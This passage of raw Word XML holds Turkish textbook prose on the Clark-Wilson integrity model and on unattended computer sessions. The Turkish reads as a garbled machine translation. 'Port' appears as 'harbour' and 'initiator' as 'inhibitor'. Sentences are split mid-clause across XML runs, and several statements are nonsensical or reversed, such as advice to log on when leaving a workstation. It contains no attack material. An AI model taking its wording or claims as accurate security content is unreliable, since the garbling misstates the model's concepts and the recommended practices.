        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Wilson ve Clark 1987’de bunu gözlemleyenlerin arasındaydı.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>erişim kontrolü modelleriyle ilgili akademik çalışma, verilerin bütünlüğünden ziyade gizliliğini vurguladı (yani,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yetkisiz modifikasyona göre yetkisiz gözlem). Buna göre, ticari bir görüşe göre belirgin bir şekilde farklı olan askeri bir görüş olarak gördüklerini telafi etmeye çalıştılar. Aslında, ne onlar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>askeri görüşün askeriyede yaygın olmadığı düşünülmektedir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Clark-Wilson modeli konu / program / nesne üçlülerinden oluşur ve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>veri, uygulama programları ve üçlülerle ilgili kurallar. Aşağıdaki bölümler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Üçlü ve kuralları daha ayrıntılı olarak tartışınız.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Üç katına. Clark-Wilson'dan önceki tüm resmi erişim kontrol modelleri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>model sipariş edilen bir konu / nesne çiftini ele alır - yani bir kullanıcı ve bir öğe veya</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sabit bir ilişkiye göre veri toplama (örneğin, okuma veya yazma)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ikisinin arasında. Clark ve Wilson ilişkinin olabileceğini kabul ettiler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">keyfi bir program tarafından uygulanır. Buna göre, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sipariş verilenleri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>konu / program / nesne üçlü. Programın bütünlüğünün uygunluğa sahip olduğunu açıkça ortaya koymak için program için “dönüşüm prosedürü” terimini kullanırlar.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>çünkü verileri bir kurala veya prosedüre göre değiştirir veya dönüştürür.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dönüşüm prosedürlerinin değiştirdiği verilere kısıtlanmış veriler denir.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>öğeler sadece dönüşümsel anlamda kısıtlı oldukları için</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>prosedürler onları ve bu bütünlük doğrulama prosedürlerini değiştirebilir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>belirli özelliklere sahip olmalarını sağlamak için üzerlerinde kısıtlamalar kullanmak,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gerçek dünyaya tutarlılık ve uygunluk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>en önemli. Sınırlandırılmamış veri öğeleri, tüm diğer verilerdir, özellikle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dönüşümsel prosedürlere girdi girdi.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Özneler bir kez kısıtlandıktan sonra, bunlara erişebilmeleri için</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nesneleri yalnızca belirtilen dönüşüm prosedürleriyle, dönüşüm prosedürleri neye ihtiyaç duyulursa mantığa gömülebilir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ayrıcalık sınırlaması ve görevlerin ayrılması. Dönüşümsel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>prosedürler, öznelerin nesnelere düzeydeki nesnelere erişimini kontrol edebilir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sisteme uygun olandan daha ince tanecikli Dahası, onlar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>daha hassas kontroller yapabilir (örneğin, makul olma ve tutarlılık kontrolleri)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kısıtlanmamış veri öğeleri üzerinde) çift girişli defter tutma gibi amaçlar için, böylece bir hesaptan çıkarılmış olanın</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bir başkasına eklenir, böylece varlık işlemlerde korunur.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kurallar. Bütünlüğün elde edilmesini ve korunmasını sağlamak için Clark ve Wilson, bazı bütünlük izleme ve bütünlük koruma kurallarının</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gerekli. Bütünlük izleme kuralları sertifika kuralları ve bütünlük koruma kuralları uygulama kuralları olarak adlandırılır.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bu sertifikalandırma kuralları aşağıdaki kavramları ele almaktadır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Sınırlandırılmış veri öğeleri tutarlıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Dönüşüm prosedürleri geçerli şekilde hareket eder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Görevler ayrılmıştır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Girişler günlüğe kaydedilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Sınırlandırılmamış veri öğeleri doğrulanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00260463" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260463">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Katılmamış Oturumlar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Başka bir tür erişim kontrolü, katılımsız oturumlarla ilgilidir. Kullanıcılar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>bilgisayarlarla sürekli etkileşime girerek saatlerce zaman geçiremiyorum</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aynı liman; herkes sık sık ara vermeye ihtiyaç duyar. Kaynak odaklı ise</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>şifreler kullanılmaz, sistemler bir oturumun tüm işlemlerini ilişkilendirmelidir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>başlatan kişiyle. Seans inhibitörü iken devam ederse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ara verir, başka biri gelip bunun içinde bir şeyler yapabilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>başlatıcının yetkisi ile oturum. Bu bir ihlal teşkil eder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>güvenlik. Bu nedenle, kullanıcıların bilgisayarlarını iş istasyonlarından uzakta olduklarında oturum açmaları konusunda cesaretlendirilmeleri gerekir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Yöneticiler kullanıcıların oturumlarına katılmasını istiyorsa, aşağıdakiler gereklidir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• İnsanların işlerine ara vermelerini ve devam etmelerini kolaylaştırın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>• Sistemdeki devamsızlıkları tespit etmeye ve oturumu korumaya çalışın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Katılımsız iken ortamın fiziksel korunmasını kolaylaştırın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Kesinlikle insan kontrolleri uygulamak (örneğin;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>suçluları tespit etmek için personel).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kullanıcılar her zaman oturumu kapatsa, katılımsız oturum olmazdı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>limanlarını terk ettiler. Çoğu kullanıcı bunu yapmaz çünkü giriş yapmaları gerekir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>geri döndüğünüzde, tipik bir sistemin oturum açma işlemi ne basit ne de</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hızlı. Bu eksikliği telafi etmek için bazı kuruluşlar hızlandırılmış</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>oturum açma / kapatma programları, ayrıca askıya alma programları da denir. Askıya alma programları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>port arasındaki fiziksel veya mantıksal bağlantının hiçbir bölümünü kesmeyin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ve bir konukçu; aksine, bağlantıyı sürdüren kaynakları keserler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD39CC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ana bilgisayarın bağlantı noktası askıya alınmış bir duruma getirilmesini sağlar. Liman serbest bırakılabilir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00AD39CC" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
